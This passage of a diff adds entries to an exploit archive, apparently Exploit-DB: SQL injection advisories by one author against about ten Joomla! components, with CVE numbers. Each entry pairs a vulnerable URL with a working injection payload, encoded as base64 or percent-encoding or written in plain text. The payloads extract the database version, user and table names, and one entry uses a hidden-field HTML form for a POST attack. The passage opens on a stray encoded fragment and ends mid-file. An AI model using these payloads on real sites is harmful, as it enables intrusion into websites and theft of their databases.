JTM1JTI3JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM2JTM2JTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTY0JTYxJTc0JTYxJTYyJTYxJTczJTY1JTI4JTI5JTJjJTMwJTc4JTM3JTY1JTM3JTY1JTM3JTY1JTM3JTY1JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI4JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI3JTVhJTQ2JTRiJTRkJTI3JTNkJTI3JTVhJTQ2JTRiJTRk
+# 
+# # # #

exploits/php/webapps/44126.txt

@@ -0,0 +1,31 @@
+# # # #
+# Exploit Title: Joomla! Component SimpleCalendar 3.1.9 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://albonico.ch/
+# Software Link: http://software.albonico.ch/downloads/file/3-simplecalendar-3-1-9.html
+# Version: 3.1.9
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5974
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[0]=[SQL]
+#  
+# JTI4JTU1JTUwJTQ0JTQxJTU0JTQ1JTU4JTRkJTRjJTI4JTMwJTJjJTJmJTJhJTIxJTMwJTMxJTMxJTMxJTMxJTQzJTRmJTRlJTQzJTQxJTU0JTJhJTJmJTI4MHgyZSUyYyU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUyOCUyOSUyYzB4N2U3ZTdlN2UlMmMlMjglNTMlNDUlNGMlNDUlNDMlNTQlMjAlMjglNDUlNGMlNTQlMjglMzYlMzYlM2QlMzYlMzYlMmMlMzElMjklMjklMjklMmMlNjQlNjElNzQlNjElNjIlNjElNzMlNjUlMjglMjklMjklMmMyOTI1JTI5JTI5
+# 
+# http://localhost/[PATH]/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=[SQL]
+# 
+# KC8qITAyMjI1VVBEQVRFWE1MKi8oNjYsQ09OQ0FUKDB4M2EsKC8qITAyMjI1U0VMRUNUKi8rR1JPVVBfQ09OQ0FUKHRhYmxlX25hbWUrU0VQQVJBVE9SKzB4M2EpK0ZST00rSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUysvKiEwMjIyNVdIRVJFKi8rVEFCTEVfU0NIRU1BPURBVEFCQVNFKCkpLChFTFQoMT0xLDEpKSksMSkp
+# 
+# # # #
+
+http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[VerAyari]=(/*!02225UPDATEXML*/(66,CONCAT(0x3a,(/*!02225SELECT*/+GROUP_CONCAT(table_name+SEPARATOR+0x3a)+FROM+INFORMATION_SCHEMA.TABLES+/*!02225WHERE*/+TABLE_SCHEMA=DATABASE()),(ELT(1=1,1))),1))
+
+http://localhost/Joomla375/index.php?option=com_simplecalendar&view=events&catid[0]=%28%55%50%44%41%54%45%58%4d%4c%28%30%2c%2f%2a%21%30%31%31%31%31%43%4f%4e%43%41%54%2a%2f%280x2e%2c%76%65%72%73%69%6f%6e%28%29%2c0x7e7e7e7e%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%2c2925%29%29
+ XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375' XPATH syntax error: '10.1.21-MariaDB~~~~1joomla375'

exploits/php/webapps/44127.txt

@@ -0,0 +1,22 @@
+# # # # 
+# Exploit Title: Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: https://thekrotek.com/
+# Software Link: https://extensions.joomla.org/extension/smart-shoutbox/
+# Version: 3.0.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5975
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # #	
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/component/smartshoutbox/archive?shoutauthor=[SQL]
+# 
+# JTMxJTI3JTIwJTJmJTJhJTIxJTMxJTMwJTMwJTMwJTMxJTUwJTcyJTZmJTYzJTY1JTY0JTc1JTcyJTY1JTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMwJTMwJTMwJTMxJTQxJTZlJTYxJTZjJTc5JTczJTY1JTJhJTJmJTIwJTI4JTY1JTc4JTc0JTcyJTYxJTYzJTc0JTc2JTYxJTZjJTc1JTY1JTI4JTMwJTJjJTJmJTJhJTIxJTMxJTMwJTMwJTMwJTMxJTYzJTZmJTZlJTYzJTYxJTc0JTJhJTJmJTI4JTMwJTc4JTMyJTM3JTJjJTMwJTc4JTM0JTM5JTM2JTM4JTM3JTMzJTM2JTMxJTM2JTY1JTMyJTMwJTM1JTMzJTM2JTM1JTM2JTY1JTM2JTMzJTM2JTMxJTM2JTY1JTJjJTMwJTc4JTMzJTYxJTJjJTQwJTQwJTc2JTY1JTcyJTczJTY5JTZmJTZlJTI5JTI5JTJjJTMwJTI5JTJkJTJkJTIwJTJk
+#
+# # # #

exploits/php/webapps/44128.txt

@@ -0,0 +1,24 @@
+# # # # 
+# Exploit Title: Joomla! Component Solidres 2.5.1 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://solidres.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/solidres/
+# Version: 2.5.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5980
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php/en/component/solidres/?location=&checkin=2018-01-08&checkout=2018-01-09&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=0&option=com_solidres&task=hub.search&start=0&Itemid=306&9f3d70a896d5f1332174599ecac43607=1&ordering=score&direction=desc[SQL]&type_id=12
+# 
+# http://localhost/[PATH]/index.php/en/component/solidres/?checkin=2018-01-08&checkout=2018-01-09&option=com_solidres&task=hub.search&direction=desc[SQL]
+# 
+# LChTRUxFQ1QgNDU2MSBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoMHg3MTYyNmE3MTcxLChTRUxFQ1QgKEVMVCg0NTYxPTQ1NjEsMSkpKSwweDcxNmI3MDYyNzEsRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLlBMVUdJTlMgR1JPVVAgQlkgeClhKQ==
+# 
+# # # #

exploits/php/webapps/44129.txt

@@ -0,0 +1,27 @@
+# # # #
+# Exploit Title: Joomla! Component Staff Master <= 1.0 RC 1 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.systemsunited.net/
+# Software Link: http://www.systemsunited.net/
+# Version: <= 1.0 RC 1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5992
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_staffmaster&view=staff&name=[SQL]
+#  
+# JTJkJTZhJTY1JTZlJTZlJTc5JTJkJTYyJTY1JTY5JTZjJTMyJTI3JTIwJTIwJTU1JTRlJTQ5JTRmJTRlJTIwJTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMxJTJjJTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTM0JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTMxJTM0JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJjJTMxJTM5JTJjJTMyJTMwJTJkJTJkJTIwJTJk
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_staffmaster&view=staff&name=[SQL]
+# 
+# JTJkJTZhJTZmJTYxJTZlJTJkJTYyJTZmJTc1JTcyJTZiJTY1JTI3JTIwJTIwJTU1JTRlJTQ5JTRmJTRlJTIwJTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMxJTJjJTMyJTJjJTMzJTJjJTM0JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTU3JTQ4JTQ1JTUyJTQ1JTIwJTU0JTQxJTQyJTRjJTQ1JTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTNkJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTI5JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJkJTJkJTIwJTJk
+# 
+# # # #

exploits/php/webapps/44130.txt

@@ -0,0 +1,24 @@
+# # # #
+# Exploit Title: Joomla! Component Timetable Responsive Schedule For Joomla 1.5 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://quanticalabs.com/joomla/
+# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-responsive-schedule-for-joomla/
+# Version: 1.5
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-6583
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # # 
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_timetable&view=event&alias=[SQL]
+# 
+# LTYnKysvKiEwNzc3N1VOSU9OKi8oLyohMDc3NzdTRUxFQ1QqLzB4MjgzMTI5LCgvKiEwNzc3N1NFTEVDVCovKEB4KS8qITA3Nzc3RlJPTSovKC8qITA3Nzc3U0VMRUNUKi8oQHg6PTB4MDApLChATlI6PTApLCgvKiEwNzc3N1NFTEVDVCovKDApLyohMDc3NzdGUk9NKi8oSU5GT1JNQVRJT05fU0NIRU1BLlRBQkxFUykvKiEwNzc3N1dIRVJFKi8oVEFCTEVfU0NIRU1BIT0weDY5NmU2NjZmNzI2ZDYxNzQ2OTZmNmU1ZjczNjM2ODY1NmQ2MSlBTkQoMHgwMClJTihAeDo9Q09OQ0FUKEB4LExQQUQoQE5SOj1ATlIlMmIxLDQsMHgzMCksMHgzYTIwLHRhYmxlX25hbWUsMHgzYzYyNzIzZSkpKSl4KSwweDI4MzMyOSwweDI4MzQyOSktLSst
+# 
+# JTJkJTM2JTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTI4JTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTMwJTc4JTMyJTM4JTMzJTMxJTMyJTM5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTMwJTc4JTMyJTM4JTMzJTMzJTMyJTM5JTJjJTMwJTc4JTMyJTM4JTMzJTM0JTMyJTM5JTI5JTJkJTJkJTIwJTJk
+# 	
+# # # #

exploits/php/webapps/44131.txt

@@ -0,0 +1,37 @@
+# # # # 
+# Exploit Title: Joomla! Pinterest Clone Social Pinboard 2.0 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: https://www.apptha.com/
+# Software Link: https://www.apptha.com/joomla/social-pinboard-script
+# Version: 2.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5987
+# # # #
+# Exploit Author: Ihsan Sencan 
+# # # #
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=ajaxcontrol&tmpl=component&task=getlikeinfo&pin_id=[SQL]&user_id=[SQL]
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=gift&starts=100&ends=[SQL]
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=home&category=[SQL]
+# 
+# 4)
+# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=pindisplay&uid=[SQL]
+# 
+# 5)
+# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=search&serachVal=[SQL]
+# 
+# 6)
+# http://localhost/[PATH]/index.php?option=com_socialpinboard&view=likes&uid=[SQL]
+# 
+# MTczODMgQU5EIChTRUxFQ1QgOTI2OCBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQodmVyc2lvbigpLChTRUxFQ1QgKEVMVCg5MjY4PTkyNjgsMSkpKSwweDc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3ODc4Nzg3OCxGTE9PUihSQU5EKDApKjIpKXggRlJPTSBJTkZPUk1BVElPTl9TQ0hFTUEuUExVR0lOUyBHUk9VUCBCWSB4KWEp
+# 
+# # # #

exploits/php/webapps/44132.txt

@@ -0,0 +1,22 @@
+# # # #
+# Exploit Title: Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: https://www.chillcreations.com/
+# Software Link: https://extensions.joomla.org/extension/ccnewsletter/
+# Version: 2.x Stable
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-5989
+# # # #
+# Exploit Author: Ihsan Sencan
+# # # #
+# 
+# POC:
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_ccnewsletter&task=removeSubscriber&id=[SQL]
+#  
+# Y2ZjZDIwODQ5NWQ1NjVlZjY2ZTdkZmY5Zjk4NzY0ZGEnJTIwT1IlMjAoU0VMRUNUJTIwMiUyMEZST00oU0VMRUNUJTIwQ09VTlQoKiksQ09OQ0FUKHZlcnNpb24oKSwoU0VMRUNUJTIwKEVMVCgxPTEsMSkpKSxkYXRhYmFzZSgpLEZMT09SKFJBTkQoMCkqMikpeCUyMEZST00lMjBJTkZPUk1BVElPTl9TQ0hFTUEuUExVR0lOUyUyMEdST1VQJTIwQlklMjB4KWEpLS0lMjBhTXBM
+# 
+# # # #

exploits/php/webapps/44133.txt

@@ -0,0 +1,28 @@
+# # # # # 
+# Exploit Title: Joomla! Component Saxum Astro 4.0.14 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.saxum2003.hu/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/astrology-a-horoscope/saxumastro/
+# Software Download: http://www.saxum2003.hu/downloadsen/file/93-astro4.html
+# Version: 4.0.14
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7180
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# # # # #
+# 
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_saxumastro&view=savedreading&publicid=[SQL]
+# 
+# JTMxJTI3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTI5JTI5JTJkJTJkJTIwJTJk
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_saxumastro&view=interpret&typeid=1&signid=[SQL]
+# 
+# JTMxJTI5JTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM2JTM2JTM1JTM1JTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTM1JTM1JTNkJTM2JTM2JTM1JTM1JTJjJTMxJTI5JTI5JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5JTIwJTQxJTRlJTQ0JTIwJTI4JTM5JTMyJTM3JTMxJTNkJTM5JTMyJTM3JTMx
+# 
+# # # # #

exploits/php/webapps/44134.txt

@@ -0,0 +1,33 @@
+# # # # # 
+# Exploit Title: Joomla! Component Saxum Numerology 3.0.4 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.saxum2003.hu/
+# Software Link: http://www.saxum2003.hu/en/downloadsen/category/7-saxumnumerology-komponens.html
+# Software Download: http://www.saxum2003.hu/downloadsen/file/104-numerology3.html?format=html
+# Version: 3.0.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7177
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# # # # #
+# 
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_saxumnumerology&view=savedresult&publicid=[SQL]
+# 
+# JTMxJTI3JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTI5JTI5JTJkJTJkJTIwJTJk
+# 
+# 2)
+# <html>
+# <body>
+# <form action="http://localhost/[PATH]/index.php?option=com_saxumnumerology&view=interpret" method="post">
+# <input name="type_id" value="KFNFTEVDVCA2NiBGUk9NKFNFTEVDVCBDT1VOVCgqKSxDT05DQVQoQ09OQ0FUX1dTKDB4MjAzYTIwLFVTRVIoKSxEQVRBQkFTRSgpLFZFUlNJT04oKSksKFNFTEVDVCAoRUxUKDY2PTY2LDEpKSksRkxPT1IoUkFORCgwKSoyKSl4IEZST00gSU5GT1JNQVRJT05fU0NIRU1BLlBMVUdJTlMgR1JPVVAgQlkgeClhKQ==" type="hidden">
+# <input type="submit" value="Ver Ayari">
+# </form>
+# </body>
+# </html>
+# 
+# # # # #

exploits/php/webapps/44135.txt

@@ -0,0 +1,43 @@
+# # # # # 
+# Exploit Title: Joomla! Component SquadManagement 1.0.3 - SQL Injection
+# Dork: N/A
+# Date: 16.02.2018
+# Vendor Homepage: http://www.larshildebrandt.de/
+# Software Link: https://extensions.joomla.org/extensions/extension/sports-a-games/sports/squadmanagement/
+# Software Download: http://www.larshildebrandt.de/joomla/download/squadmanagement.html?download=91:squadmanagement-1-0-3
+# Version: 1.0.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: CVE-2018-7179
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# # # # #
+# 
+# POC: 
+# 
+# 1)
+# http://localhost/[PATH]/index.php?option=com_squadmanagement&task=removewarround&id=[SQL]
+# 
+# JTMxJTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM0JTMyJTMwJTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM0JTMyJTMwJTM2JTNkJTM0JTMyJTMwJTM2JTJjJTMxJTI5JTI5JTI5JTI5JTI5
+# 
+# 2)
+# http://localhost/[PATH]/index.php?option=com_squadmanagement&controller=appointment&task=deleteappointment&id=[SQL]
+# 
+# JTM5JTM5JTM5JTM5JTM5JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM1JTM2JTM2JTMyJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTI5JTI5
+# 
+# 3)
+# http://localhost/[PATH]/index.php?option=com_squadmanagement&controller=appointment&task=removefromappointment&id=[SQL]
+# 
+# JTM5JTM5JTM5JTM5JTM5JTM5JTIwJTQxJTRlJTQ0JTIwJTQ1JTU4JTU0JTUyJTQxJTQzJTU0JTU2JTQxJTRjJTU1JTQ1JTI4JTM2JTM2JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTMwJTc4JTM1JTYzJTJjJTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTI5JTI5
+# 
+# 4)
+# http://localhost/[PATH]/index.php?option=com_squadmanagement&view=editsquad&format=memberlist&squadid=[SQL]
+# 
+# JTMxJTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTM2JTM2JTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTM2JTM2JTNkJTM2JTM2JTJjJTMxJTI5JTI5JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5
+# 
+# 5)
+# http://localhost/[PATH]/index.php?option=com_squadmanagement&controller=squadmembers&task=addmember&squadid=[SQL]
+# 
+# JTMxJTIwJTQxJTRlJTQ0JTIwJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTMxJTMzJTM5JTM5JTIwJTQ2JTUyJTRmJTRkJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQzJTRmJTU1JTRlJTU0JTI4JTJhJTI5JTJjJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTQzJTRmJTRlJTQzJTQxJTU0JTVmJTU3JTUzJTI4JTMwJTc4JTMyJTMwJTMzJTYxJTMyJTMwJTJjJTU1JTUzJTQ1JTUyJTI4JTI5JTJjJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTJjJTU2JTQ1JTUyJTUzJTQ5JTRmJTRlJTI4JTI5JTI5JTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTI4JTQ1JTRjJTU0JTI4JTMxJTMzJTM5JTM5JTNkJTMxJTMzJTM5JTM5JTJjJTMxJTI5JTI5JTI5JTJjJTQ2JTRjJTRmJTRmJTUyJTI4JTUyJTQxJTRlJTQ0JTI4JTMwJTI5JTJhJTMyJTI5JTI5JTc4JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTUwJTRjJTU1JTQ3JTQ5JTRlJTUzJTIwJTQ3JTUyJTRmJTU1JTUwJTIwJTQyJTU5JTIwJTc4JTI5JTYxJTI5
+# 
+# # # # #

exploits/php/webapps/44136.txt

@@ -0,0 +1,30 @@
+# # # # # 
